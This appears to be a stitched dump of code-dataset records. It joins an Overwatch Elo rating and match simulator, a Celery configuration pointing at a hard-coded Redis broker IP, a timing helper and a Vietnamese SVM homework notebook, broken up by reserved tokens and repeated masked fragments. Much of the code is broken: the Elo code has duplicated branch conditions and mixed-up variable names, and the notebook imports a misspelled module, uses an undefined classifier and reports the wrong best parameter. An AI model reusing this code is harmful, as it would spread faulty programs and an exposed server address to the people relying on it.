self.mapname_elos = {t:{m:season.mapname_elos[t][m] for m in mapnames} for t in teams}\n\n self.map_draws = {m:[season.map_draws[m][0],season.map_draws[m][1]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n\n self.standings = {t:{'w':season.standings[t]['w'],'l':season.standings[t]['l'],'d':season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t]*=decay_factor\n for m in mapnames:\n self.mapname_elos[t][m]*=decay_factor\n for m in maptypes:\n self.maptype_elos[t][m]*=decay_factor\n\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams: self.elorecords[t][i].append(self.overall_elos[t])\n\n for match in 
stage['regular']+stage['playoffs']:\n if not match['completed']: continue\n\n t1, t2 = match['t1'], match['t2']\n\n if i==3:\n self.stage4played[t1]+=1\n self.stage4played[t2]+=1\n\n # Season Standing W/L\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result']=='t1'])>len([x for x in match['maps'] if x['result']=='t2']):\n self.standings[t1]['w']+=1\n self.standings[t2]['l']+=1\n else:\n self.standings[t1]['l']+=1\n self.standings[t2]['w']+=1\n\n for map in match['maps']:\n t1_elo = (self.overall_elos[t1]*overall_weight + \n self.mapname_elos[t1][map['mapname']]*mapname_weight + \n self.maptype_elos[t1][map['maptype']]*maptype_weight)\n t2_elo = (self.overall_elos[t2]*overall_weight + \n self.mapname_elos[t2][map['mapname']]*mapname_weight + \n self.maptype_elos[t2][map['maptype']]*maptype_weight)\n\n exp_t1 = 1/(1+10**((t2_elo-t1_elo)/d)) # Expected Scores\n exp_t2 = 1/(1+10**((t1_elo-t2_elo)/d))\n\n act_t1 = 1 if map['result']=='t1' else 0 if map['result']=='t2' else 0.5 # Actual Scores\n act_t2 = 1 if map['result']=='t2' else 0 if map['result']=='t1' else 0.5\n\n self.map_draws[map['mapname']][0] += 1 if act_t1==0.5 else 0 # Draw %\n self.map_draws[map['mapname']][1] += 1\n\n if match in stage['regular']:\n self.standings[t1]['d']+= 1 if map['result']=='t1' else -1 if map['result']=='t2' else 0 # Standings Differential\n self.standings[t2]['d']+= 1 if map['result']=='t2' else -1 if map['result']=='t1' else 0\n\n MoV = 1 # Margin of Victory\n elo_dif = 0 # Elo Difference\n if act_t1==1: # The team that won determines the margin of victory\n MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1)\n elo_dif = t1_elo-t2_elo\n elif act_t2==1:\n MoV = (map['deaths'][t1]+1)/(map['deaths'][t2]+1)\n elo_dif = t2_elo-t1_elo\n else: # In case of a draw, the team with higher elo determines margin of \"victory\"\n if t1_elo>t2_elo:\n MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1)\n elo_dif = t1_elo-t2_elo\n elif t1_elo>t2_elo:\n MoV = 
(map['deaths'][t1]+1)/(map['deaths'][t2]+1)\n elo_dif = t2_elo-t1_elo\n\n self.margins_of_victory.append(MoV)\n \n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map[\"maptype\"]] += t1_change\n self.mapname_elos[t1][map[\"mapname\"]] += t1_change\n\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map[\"maptype\"]] += t2_change\n self.mapname_elos[t2][map[\"mapname\"]] += t2_change\n\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self,name):\n types = {\n **dict.fromkeys(['hanamura','horizon-lunar-colony','temple-of-anubis','volskaya','paris'],'assault'),\n **dict.fromkeys(['dorado','junkertown','rialto','route-66','gibraltar','Havana'],'escort'),\n **dict.fromkeys(['blizzard-world','eichenwalde','hollywood','kings-row','numbani'],'hybrid'),\n **dict.fromkeys(['busan','ilios','lijiang','nepal','oasis'],'control')\n }\n\n return types[name]\n \n def predictMatch(self,team1, team2, maps, loops = 10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType,maps))\n\n for x in range(loops):\n team1score = 0\n team2score = 0\n\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0]/self.map_draws[maps[i]][1]\n\n elo1 = (self.overall_elos[team1]*overall_weight + \n self.mapname_elos[team1][maps[i]]*mapname_weight + \n self.maptype_elos[team1][maptypes[i]]*maptype_weight)\n elo2 = (self.overall_elos[team2]*overall_weight + \n self.mapname_elos[team2][maps[i]]*mapname_weight + \n self.maptype_elos[team2][maptypes[i]]*maptype_weight)\n \n random_roll = random.random()\n team1winchance = 1/(1+10**((elo2-elo1)/d))\n\n #drawchance *= min(team1winchance,1-team1winchance)*2\n\n if random_roll < team1winchance - drawchance/2: team1score +=1\n elif random_roll < team1winchance + drawchance/2: pass\n 
else: team2score +=1\n \n if team1score==team2score:\n map5 = random.choice([m for m in ['ilios','busan','lijiang'] if m not in maps])\n\n elo1 = (self.overall_elos[team1]*overall_weight +\n self.maptype_elos[team1]['control']*maptype_weight +\n self.mapname_elos[team1][map5]*mapname_weight)\n elo2 = (self.overall_elos[team2]*overall_weight +\n self.maptype_elos[team2]['control']*maptype_weight +\n self.mapname_elos[team2][map5]*mapname_weight)\n\n if random.random()< 1/(1+10**((elo2-elo1)/d)): team1score+=1\n else: team2score +=1\n \n scoreline = \"{}-{}\".format(team1score,team2score)\n if scoreline not in results: results[scoreline]=0\n results[scoreline]+=1\n if team1score>team2score: team1wins += 1 \n\n \n results = {s:results[s]/loops for s in results}\n return results, team1wins/loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4):\n '''\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n '''\n\n types = [self.getMapType(m) for m in maps]\n\n score = [0,0]\n\n def simulateMap(mapname,maptype):\n elo1 = (self.overall_elos[team1]*overall_weight + \n self.mapname_elos[team1][mapname]*mapname_weight + \n self.maptype_elos[team1][maptype]*maptype_weight)\n elo2 = (self.overall_elos[team2]*overall_weight + \n self.mapname_elos[team2][mapname]*mapname_weight + \n self.maptype_elos[team2][maptype]*maptype_weight)\n \n random_roll = random.random()\n team1winchance = 1/(1+10**((elo2-elo1)/d))\n drawchance = self.map_draws[mapname][0]/self.map_draws[mapname][1] * min(team1winchance,1-team1winchance)*2\n\n if random_roll < team1winchance - drawchance/2: act_t1, act_t2 = 1,0\n elif random_roll < team1winchance + drawchance/2: act_t1, act_t2 = 0.5,0.5\n else: act_t1, act_t2 = 0,1\n \n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n\n exp_t1 = 1/(1+10**((elo2-elo1)/d)) # Expected Scores\n exp_t2 = 1/(1+10**((elo1-elo2)/d))\n\n if act_t1==1: elo_dif = elo1-elo2\n elif act_t2==1: 
elo_dif = elo2-elo1\n else:\n if elo1>elo2: elo_dif = elo1-elo2\n elif elo1>elo2: elo_dif = elo2-elo1\n else: elo_dif = 0\n\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n \n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n\n return round(act_t1),round(act_t2)\n \n if type=='regular':\n for i in range(len(maps)):\n score1,score2 = simulateMap(maps[i],types[i])\n score[0]+=score1\n score[1]+=score2\n \n if score[0]==score[1]:\n map5 = random.choice([x for x in mapnames if self.getMapType(x)=='control' and x not in maps])\n score1,score2 = simulateMap(map5,'control')\n score[0]+=score1\n score[1]+=score2\n \n if score[0]>score[1]:\n self.standings[team1]['w']+=1\n self.standings[team2]['l']+=1\n else:\n self.standings[team1]['l']+=1\n self.standings[team2]['w']+=1\n \n self.standings[team1]['d']+=score[0]-score[1]\n self.standings[team2]['d']+=score[1]-score[0]\n\n if type=='playoffs':\n mappreferences = {t:{mt:[x for x in postseasonmappool if self.getMapType(x)==mt] for mt in maptypes} for t in [team1,team2]}\n for t in [team1,team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x:self.mapname_elos[t][x]-self.mapname_elos[{team1:team2,team2:team1}[t]][x],reverse=True)\n\n mapprogression = ['control','hybrid','assault','escort']\n\n scores = [0,0]\n mnum = 0\n played = []\n picker = team1\n\n while max(score)<firstto:\n mtype = mapprogression[mnum%4]\n mname = [m for m in mappreferences[picker][mtype] if m not in played][0]\n played.append(mname)\n mnum += 1\n\n score1,score2 = simulateMap(mname,mtype)\n\n if score1==1:\n picker=team2\n score[0]+=1\n elif score2==1:\n picker=team1\n score[1]+=1\n\n if score[0]>score[1]: return 
[team1,team2]\n else: return [team2,team1]\n\n return\n", "step-ids": [ 5, 7, 8, 9, 10 ] }
[ 5, 7, 8, 9, 10 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> broker_url = 'redis://120.78.168.67/10' CELERY_RESULT_BACKEND = 'redis://120.78.168.67/0' CELERY_TIMEZONE = 'Asia/Shanghai' <|reserved_special_token_1|> # Celery配置文件 # 指定消息队列为Redis broker_url = "redis://120.78.168.67/10" CELERY_RESULT_BACKEND = "redis://120.78.168.67/0" CELERY_TIMEZONE = 'Asia/Shanghai'
flexible
{ "blob_id": "095374aa7613f163fedbd7d253219478108d4f42", "index": 992, "step-1": "<mask token>\n", "step-2": "broker_url = 'redis://120.78.168.67/10'\nCELERY_RESULT_BACKEND = 'redis://120.78.168.67/0'\nCELERY_TIMEZONE = 'Asia/Shanghai'\n", "step-3": "# Celery配置文件\n\n# 指定消息队列为Redis\nbroker_url = \"redis://120.78.168.67/10\"\nCELERY_RESULT_BACKEND = \"redis://120.78.168.67/0\"\nCELERY_TIMEZONE = 'Asia/Shanghai'\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def time_func(func, arg): start = time.time() func(arg) return time.time() - start <|reserved_special_token_1|> import time def time_func(func, arg): start = time.time() func(arg) return time.time() - start <|reserved_special_token_1|> import time # Returns time in seconds for func(arg) to run def time_func(func, arg): start = time.time() func(arg) return time.time() - start
flexible
{ "blob_id": "7f406c1cd4d56da3a7d5f8739e0b65b0e61cf637", "index": 5290, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n", "step-3": "import time\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n", "step-4": "import time\n\n# Returns time in seconds for func(arg) to run\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> df.pivot_table(index=['classes'], aggfunc='size') <|reserved_special_token_0|> for n in np.arange(0.5, C_parameter, 0.5): clf = svm.SVC(C=n).fit(X_train, y_train) yhat = clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print('Result with C = ' + str(n)) np.set_printoptions(precision=2) print(classification_report(y_test, yhat)) print('The best accuracy was with', max(mean_acc), 'with C=', n) <|reserved_special_token_0|> lin_clf.fit(X_train, y_train) <|reserved_special_token_0|> accuracy_score(y_train, y_pred) <|reserved_special_token_0|> accuracy_score(y_test, y_test_predict) <|reserved_special_token_0|> lin_clf.fit(X_train, y_train) <|reserved_special_token_0|> accuracy_score(y_train, y_pred) <|reserved_special_token_0|> accuracy_score(y_test, y_test_predict) <|reserved_special_token_0|> rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> df = pd.read_csv('thyroid_sick.csv') X = df[[column_name for column_name in df.columns if column_name != 'classes']] y = df[['classes']] X = preprocessing.StandardScaler().fit(X).transform(X.astype(float)) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42) df.pivot_table(index=['classes'], aggfunc='size') <|reserved_special_token_0|> C_parameter = 10.5 mean_acc = [] for n in np.arange(0.5, C_parameter, 0.5): clf = svm.SVC(C=n).fit(X_train, y_train) yhat = clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print('Result with C = ' + str(n)) np.set_printoptions(precision=2) print(classification_report(y_test, yhat)) print('The best accuracy was with', max(mean_acc), 'with C=', n) <|reserved_special_token_0|> mnist = fetch_openml('mnist_784', version=1, cache=True) X = mnist['data'] y = 
mnist['target'].astype(np.uint8) X_train = X[:60000] y_train = y[:60000] X_test = X[60000:] y_test = y[60000:] lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test) accuracy_score(y_test, y_test_predict) Scaler = StandardScaler() X_train_scaled = Scaler.fit_transform(X_train.astype(np.float32)) X_test_scaled = Scaler.fit_transform(X_test.astype(np.float32)) lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test_scaled) accuracy_score(y_test, y_test_predict) <|reserved_special_token_0|> param_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)} rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3) rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) <|reserved_special_token_0|> housing = fetch_california_housing() X = housing['data'] y = housing['target'] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) <|reserved_special_token_1|> import pandas as pd from sklearn.model_selection import train_test_split from sklearn import preprocessing from sklearn.metrics import classification_report, confusion_matrix, accuracy_score import itertools import numpy as np from sklearn import preprocessing df = pd.read_csv('thyroid_sick.csv') X = df[[column_name for column_name in df.columns if column_name != 'classes']] y = df[['classes']] X = preprocessing.StandardScaler().fit(X).transform(X.astype(float)) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42) df.pivot_table(index=['classes'], aggfunc='size') from sklearn import svm C_parameter = 10.5 mean_acc = [] for n in np.arange(0.5, C_parameter, 0.5): clf = svm.SVC(C=n).fit(X_train, y_train) yhat = clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, 
yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print('Result with C = ' + str(n)) np.set_printoptions(precision=2) print(classification_report(y_test, yhat)) print('The best accuracy was with', max(mean_acc), 'with C=', n) import numpy as np from sklearn.svm import LinearSVC from sklearn.datasets import fetch_openml from sklearn.metrics import accuracy_score from sklearn.preprocessing import StandardScaler mnist = fetch_openml('mnist_784', version=1, cache=True) X = mnist['data'] y = mnist['target'].astype(np.uint8) X_train = X[:60000] y_train = y[:60000] X_test = X[60000:] y_test = y[60000:] lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test) accuracy_score(y_test, y_test_predict) Scaler = StandardScaler() X_train_scaled = Scaler.fit_transform(X_train.astype(np.float32)) X_test_scaled = Scaler.fit_transform(X_test.astype(np.float32)) lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test_scaled) accuracy_score(y_test, y_test_predict) from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciproca, uniform from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciprocal, uniform from sklearn.svm import SVC param_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)} rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3) rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) from sklearn.datasets import fetch_california_housing from sklearn.model_selection import train_test_split housing = fetch_california_housing() X = housing['data'] y = housing['target'] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) <|reserved_special_token_1|> # To add a new cell, type '# %%' # To add 
a new markdown cell, type '# %% [markdown]' # %% [markdown] # ### Bài tập 1. # - <ins>Yêu cầu</ins>: Ý tưởng cơ bản của thuật toán ``Support Vector Machine`` (``SVM``) là gì? Ý tưởng của thuật toán biên mềm (``soft margin``) ``SVM``. Nêu ý nghĩa của siêu tham số ``C`` trong bài toán cực tiểu hàm mất mát. # # 1. Ý tưởng cơ bản của SVM là đưa toàn bộ dataset vào không gian nhiều chiều (n chiều), từ đó tìm ra mặt phẳng thích hợp nhất (hyperplane) để phân chia # 2. Support Vector Machine thuần (hard margin) thì gặp hai vấn đề chính đó là nó chỉ hoạt động trên dataset ``Linearly Separable`` và thứ 2 đó là nó khá nhạy cảm với biến nhiễu (sensitive to noise). Để tránh vấn đề này, chúng ta cần sử dụng một mô hình linh hoạt # hơn. Nhiệm vụ của nó là tìm được mặt phẳng vẫn phân loại tốt nhưng chấp nhận sai lệch ở một mức độ chấp nhận được. # 3. Tham số `C` là hằng số dương giúp cân đối độ lớn của margin và sự hy sinh của các điểm nằm trong vùng không an toàn. Khi $C = \infty $ hoặc rất lớn, Soft Margin SVM trở thành Hard Margin SVM. # %% [markdown] # ### Bài tập 2. # - <ins>Yêu cầu</ins>: Sử dụng mô hình ``SVM`` thuộc thư viện ``sklearn`` để xây dựng mô hình phân loại dựa trên tập dữ liệu huấn luyện ``X_train``, ``y_train``. Hãy nhận xét về tỉ lệ nhãn ``0`` và ``1`` trong bộ dữ liệu đã cho như đoạn code bên dưới. Hãy thử thay đổi giá trị của tham số ``C`` và nhận xét các độ đo ``Recall``, ``Precison``, ``F1-score``, và ``Accuracy`` của mô hình thu được trên tập dữ liệu kiểm tra ``X_test``, ``y_test``. 
# - Nguồn tham khảo dữ liệu ``thyroid_sick.csv``: https://archive.ics.uci.edu/ml/datasets/Thyroid+Disease # %% import pandas as pd from sklearn.model_selection import train_test_split from sklearn import preprocessing from sklearn.metrics import classification_report, confusion_matrix, accuracy_score import itertools import numpy as np from sklearn import preprocessing # %% df = pd.read_csv('thyroid_sick.csv') X = df[[column_name for column_name in df.columns if column_name != 'classes']] y = df[['classes']] X = preprocessing.StandardScaler().fit(X).transform(X.astype(float)) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42) # %% df.pivot_table(index =['classes'], aggfunc='size') # %% [markdown] # * Nhận xét: # %% from sklearn import svm C_parameter = 10.5 mean_acc = [] for n in np.arange(0.5, C_parameter, 0.5): #Train Model and Predict clf = svm.SVC(C=n).fit(X_train,y_train) yhat=clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print("Result with C = " + str(n)) np.set_printoptions(precision=2) print (classification_report(y_test, yhat)) print( "The best accuracy was with", max(mean_acc), "with C=", n) # %% [markdown] # ### Bài tập 3. # - <ins>Yêu cầu</ins>: Ý tưởng của hàm ``kernel`` $K(\dots, \dots)$ là gì? Khi nào chúng ta áp dụng hàm ``kernel``? Chúng ta có cần biết biểu thức của hàm $\Phi(x)$ không? # 1. Kernel SVM là việc đi tìm một hàm số biến đổi dữ liệu $x$ từ không gian feature ban đầu thành dữ liệu trong một không gian mới bằng hàm số $\Phi(\mathbf{x})$. Hàm số này cần thoả mãn mục đích đó là tronng không gian mới, dữ liệu giữa hai classes là phân biệt tuyến tính hoặc gần như phần biệt tuyến tính. # 2. Chúng ta áp dụng hàm ``kernel`` khi dữ liệu không phân biệt tuyến tính, Với dữ liệu gần phân biệt tuyến tính, linear và poly kernels cho kết quả tốt hơn. # 3. # %% [markdown] # ### Bài tập 4. 
# - <ins>Yêu cầu</ins>: Cho điểm dữ liệu trong không gian hai chiều $x = [x_1, x_2]^T$ và hàm biến đổi sang không gian năm chiều $\Phi(x) = [1, \sqrt{2}x_1, \sqrt{2}x_2, x_1^2, \sqrt{2}x_1x_2, x_2^2]^T$. Hãy tính hàm ``kernel`` $K(a, b)$. # # \begin{eqnarray} # \Phi(\mathbf{x})^T\Phi(\mathbf{z}) &=& [1, \sqrt{2} x_1, \sqrt{2} x_2, x_1^2, \sqrt{2} x_1x_2, x_2^2] [1, \sqrt{2} z_1, \sqrt{2} z_2, z_1^2, \sqrt{2} z_1z_2, z_2^2]^T \\ # &=& 1 + 2x_1z_1 + 2x_2z_2 + x_1^2x_2^2 + 2x_1z_1x_2z_2 + x_2^2z_2^2 \\ # &=& (1 + x_1z_1 + x_2z_2)^2 = (1 + \mathbf{x}^T\mathbf{z})^2 = k(\mathbf{x}, \mathbf{z}) # \end{eqnarray} # %% [markdown] # ### Bài tập 5. # - <ins>Yêu cầu</ins>: Giả sử bạn dùng bộ phân loại ``SVM`` với hàm ``kernel`` (radial basis function) ``RBF`` cho tập huấn luyện và thấy mô hình phân loại chưa tốt. Để cải thiện, bạn sẽ giảm hay tăng tham số $\gamma$ trong công thức hàm ``kernel``, tham số ``C`` trong hàm mất mát. # %% [markdown] # ### Bài tập 6. (Exercise 9 trang 174, Chapter 5: Support Vector Machines) # - <ins>Yêu cầu</ins>: Huấn luyện một bộ phân lớp ``SVM`` dựa trên bộ dữ liệu ``MNIST`` (dùng để phân loại hình ảnh các ký tự số có cùng kích thước). Bởi vì bộ phân loại ``SVM`` là bộ phân lớp nhị phân, chúng ta sẽ cần sử dụng chiến thuật ``one-versus-the-rest`` để phân loại tất cả ``10`` ký tự số (trong thực tế chúng ta chỉ dùng chiến thuật ``one-versus-one`` trong các trường hợp dữ liệu nhỏ). Bạn hãy báo cáo độ chính xác (``accuracy``) của mô hình đã huấn luyện trên tập test. 
# %% import numpy as np from sklearn.svm import LinearSVC from sklearn.datasets import fetch_openml from sklearn.metrics import accuracy_score from sklearn.preprocessing import StandardScaler mnist = fetch_openml('mnist_784', version=1, cache=True) # %% X = mnist["data"] y = mnist["target"].astype(np.uint8) X_train = X[:60000] y_train = y[:60000] X_test = X[60000:] y_test = y[60000:] lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) # %% y_test_predict =lin_clf.predict(X_test) accuracy_score(y_test, y_test_predict) # %% Scaler = StandardScaler() X_train_scaled = Scaler.fit_transform(X_train.astype(np.float32)) X_test_scaled = Scaler.fit_transform(X_test.astype(np.float32)) # %% lin_clf = LinearSVC(random_state =42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) # %% y_test_predict = lin_clf.predict(X_test_scaled) accuracy_score(y_test, y_test_predict) from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciproca, uniform from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciprocal, uniform from sklearn.svm import SVC param_distributions = {"gamma": reciprocal(0.001, 0.1), "C": uniform(1, 10)} rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3) rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) # %% [markdown] # ### Bài tập 7. (Exercise 10 trang 174, Chapter 5: Support Vector Machines) # - <ins>Yêu cầu</ins>: Hãy huấn luyện một mô hình hồi quy tuyến tính với dữ liệu giá nhà ``California housing dataset``. # %% from sklearn.datasets import fetch_california_housing from sklearn.model_selection import train_test_split housing = fetch_california_housing() X = housing["data"] y = housing["target"] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
flexible
{ "blob_id": "1b1b646a75fe2ff8d54e66d025b60bde0c9ed2d6", "index": 9361, "step-1": "<mask token>\n", "step-2": "<mask token>\ndf.pivot_table(index=['classes'], aggfunc='size')\n<mask token>\nfor n in np.arange(0.5, C_parameter, 0.5):\n clf = svm.SVC(C=n).fit(X_train, y_train)\n yhat = clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print('Result with C = ' + str(n))\n np.set_printoptions(precision=2)\n print(classification_report(y_test, yhat))\nprint('The best accuracy was with', max(mean_acc), 'with C=', n)\n<mask token>\nlin_clf.fit(X_train, y_train)\n<mask token>\naccuracy_score(y_train, y_pred)\n<mask token>\naccuracy_score(y_test, y_test_predict)\n<mask token>\nlin_clf.fit(X_train, y_train)\n<mask token>\naccuracy_score(y_train, y_pred)\n<mask token>\naccuracy_score(y_test, y_test_predict)\n<mask token>\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\n<mask token>\n", "step-3": "<mask token>\ndf = pd.read_csv('thyroid_sick.csv')\nX = df[[column_name for column_name in df.columns if column_name != 'classes']]\ny = df[['classes']]\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n random_state=42)\ndf.pivot_table(index=['classes'], aggfunc='size')\n<mask token>\nC_parameter = 10.5\nmean_acc = []\nfor n in np.arange(0.5, C_parameter, 0.5):\n clf = svm.SVC(C=n).fit(X_train, y_train)\n yhat = clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print('Result with C = ' + str(n))\n np.set_printoptions(precision=2)\n print(classification_report(y_test, yhat))\nprint('The best accuracy was with', max(mean_acc), 'with C=', n)\n<mask token>\nmnist = fetch_openml('mnist_784', version=1, cache=True)\nX = mnist['data']\ny = mnist['target'].astype(np.uint8)\nX_train = X[:60000]\ny_train = y[:60000]\nX_test = X[60000:]\ny_test = 
y[60000:]\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test)\naccuracy_score(y_test, y_test_predict)\nScaler = StandardScaler()\nX_train_scaled = Scaler.fit_transform(X_train.astype(np.float32))\nX_test_scaled = Scaler.fit_transform(X_test.astype(np.float32))\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test_scaled)\naccuracy_score(y_test, y_test_predict)\n<mask token>\nparam_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)}\nrnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10,\n verbose=2, cv=3)\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\n<mask token>\nhousing = fetch_california_housing()\nX = housing['data']\ny = housing['target']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,\n random_state=42)\n", "step-4": "import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nimport itertools\nimport numpy as np\nfrom sklearn import preprocessing\ndf = pd.read_csv('thyroid_sick.csv')\nX = df[[column_name for column_name in df.columns if column_name != 'classes']]\ny = df[['classes']]\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n random_state=42)\ndf.pivot_table(index=['classes'], aggfunc='size')\nfrom sklearn import svm\nC_parameter = 10.5\nmean_acc = []\nfor n in np.arange(0.5, C_parameter, 0.5):\n clf = svm.SVC(C=n).fit(X_train, y_train)\n yhat = clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print('Result with C = ' + 
str(n))\n np.set_printoptions(precision=2)\n print(classification_report(y_test, yhat))\nprint('The best accuracy was with', max(mean_acc), 'with C=', n)\nimport numpy as np\nfrom sklearn.svm import LinearSVC\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nmnist = fetch_openml('mnist_784', version=1, cache=True)\nX = mnist['data']\ny = mnist['target'].astype(np.uint8)\nX_train = X[:60000]\ny_train = y[:60000]\nX_test = X[60000:]\ny_test = y[60000:]\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test)\naccuracy_score(y_test, y_test_predict)\nScaler = StandardScaler()\nX_train_scaled = Scaler.fit_transform(X_train.astype(np.float32))\nX_test_scaled = Scaler.fit_transform(X_test.astype(np.float32))\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test_scaled)\naccuracy_score(y_test, y_test_predict)\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciproca, uniform\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciprocal, uniform\nfrom sklearn.svm import SVC\nparam_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)}\nrnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10,\n verbose=2, cv=3)\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.model_selection import train_test_split\nhousing = fetch_california_housing()\nX = housing['data']\ny = housing['target']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,\n 